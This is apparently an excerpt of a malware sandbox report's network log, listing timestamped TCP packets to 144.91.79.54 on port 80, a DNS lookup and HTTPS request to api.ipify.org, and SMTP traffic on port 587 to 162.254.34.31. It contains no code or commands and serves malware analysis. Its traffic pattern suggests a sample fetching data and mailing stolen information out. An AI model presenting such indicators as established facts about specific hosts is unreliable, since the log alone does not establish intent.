                                                                Oct 22, 2024 14:46:05.858983040 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.859003067 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859036922 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859050989 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.859069109 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859113932 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.859708071 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859743118 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859776020 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859795094 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.859810114 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859843016 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859854937 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.859877110 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859910965 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859930992 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.859946966 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859982014 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.859998941 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.860578060 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.860610962 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.860630035 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.860658884 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.860692978 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.860718012 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.860727072 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.860760927 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.860770941 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.860794067 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.860829115 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.860840082 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.860862970 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.860909939 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.861464024 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.861511946 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.861545086 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.861562967 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.861578941 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.861612082 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.861625910 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.861646891 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.861681938 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.861696005 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.861716032 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.861748934 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.861763954 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.862099886 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.862135887 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.862159014 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.862199068 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.862234116 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.862251043 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.862267017 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.862299919 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.862315893 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.862333059 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.862373114 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.862385988 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.862411022 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.862443924 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.862453938 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.862478018 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.862521887 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.863106966 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.863120079 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.863130093 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.863135099 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.863146067 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.863158941 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.863169909 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.863177061 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.863181114 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.863193035 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.863207102 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.863225937 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.863225937 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.863234043 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.863259077 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.863991022 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864002943 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864013910 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864025116 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864037037 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864038944 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.864047050 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864051104 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.864063978 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864077091 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864078999 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.864089012 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864101887 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864113092 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864120960 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.864151001 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.864892960 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864903927 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864917040 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864929914 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864947081 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864959002 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.864959955 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864972115 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864983082 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.864984989 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.864994049 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865005970 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865008116 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.865019083 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865031958 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.865057945 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.865776062 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865787983 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865797997 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865809917 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865822077 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865828037 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.865833998 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865844965 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865854025 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.865859985 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865873098 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865875959 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.865885019 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865894079 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.865895033 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865907907 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.865922928 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.865950108 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.866681099 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.866694927 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.866704941 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.866718054 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.866729021 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.866731882 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.866745949 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.866758108 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.866759062 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.866769075 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.866780996 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.866780996 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.866794109 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.866806030 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.866808891 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.866841078 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.867481947 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.867495060 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.867505074 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.867521048 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.867531061 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.867568970 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.867748976 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.867759943 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.867769957 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.867783070 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.867798090 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.867829084 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.868030071 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868041992 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868052959 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868063927 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868074894 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.868098021 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.868273973 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868284941 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868294954 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868307114 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868319988 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.868324995 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868338108 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868349075 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868356943 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.868360996 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868371964 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868375063 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.868406057 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.868944883 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868957043 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868967056 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868978977 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868993044 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.868999958 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.869004965 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.869019032 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.869029999 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.869041920 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.869045019 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.869059086 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.869083881 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.894577980 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.894634008 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.894646883 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.894690990 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.894737959 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.894862890 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.894871950 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.894884109 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.894933939 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.894941092 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.894952059 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.894963026 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.894993067 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.895169020 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895181894 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895193100 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895221949 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.895247936 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.895481110 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895492077 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895503998 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895534992 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.895673990 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895690918 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895701885 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895714045 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895723104 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.895725012 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895736933 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895755053 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.895759106 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895771980 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.895782948 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.895812035 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.896187067 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.896239996 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.971148968 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971189976 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971299887 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971311092 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.971352100 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971386909 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971411943 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.971441031 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971474886 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971489906 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.971508980 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971544027 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971554041 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.971576929 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971611023 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971633911 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.971646070 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971699953 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.971725941 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971858978 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971892118 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971909046 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.971925020 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971956968 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.971976995 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.971990108 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.972022057 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.972040892 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.972054958 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.972100973 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.972296953 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.972328901 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.972362995 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.972388029 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.972395897 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.972444057 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:06.189971924 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:06.280112982 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:06.531855106 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:06.578753948 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:06.621951103 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:06.627656937 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:06.877648115 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:06.877672911 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:06.877681971 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:06.877790928 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:06.877801895 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:06.879337072 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:06.879337072 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:06.922645092 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:07.722201109 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:27.829838037 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:27.829888105 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:27.830085993 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:27.835208893 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:27.835227013 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.437659025 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.437861919 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:28.450162888 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:28.450187922 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.450434923 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.500616074 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:28.636591911 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:28.679327011 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.823514938 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.823602915 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.823656082 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:28.873050928 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:29.716372013 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:29.721887112 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:29.721959114 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:30.533571005 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:30.536145926 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:30.541593075 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:30.698116064 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:30.704118013 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:30.709590912 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:30.866111040 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:30.875611067 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:30.881145954 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.045274973 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.045531034 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.050904989 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.209078074 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.210385084 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.215876102 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.375787973 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.375917912 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.381452084 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.537045002 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.537710905 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.537759066 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.537776947 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.537789106 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.543262959 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.543278933 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.543292999 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.543306112 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.704010010 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.750612974 CEST49764587192.168.2.5162.254.34.31

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 22, 2024 14:46:27.815975904 CEST5539953192.168.2.51.1.1.1
                                                                Oct 22, 2024 14:46:27.823873997 CEST53553991.1.1.1192.168.2.5

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 22, 2024 14:46:27.815975904 CEST192.168.2.51.1.1.10x5953Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 22, 2024 14:46:27.823873997 CEST1.1.1.1192.168.2.50x5953No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
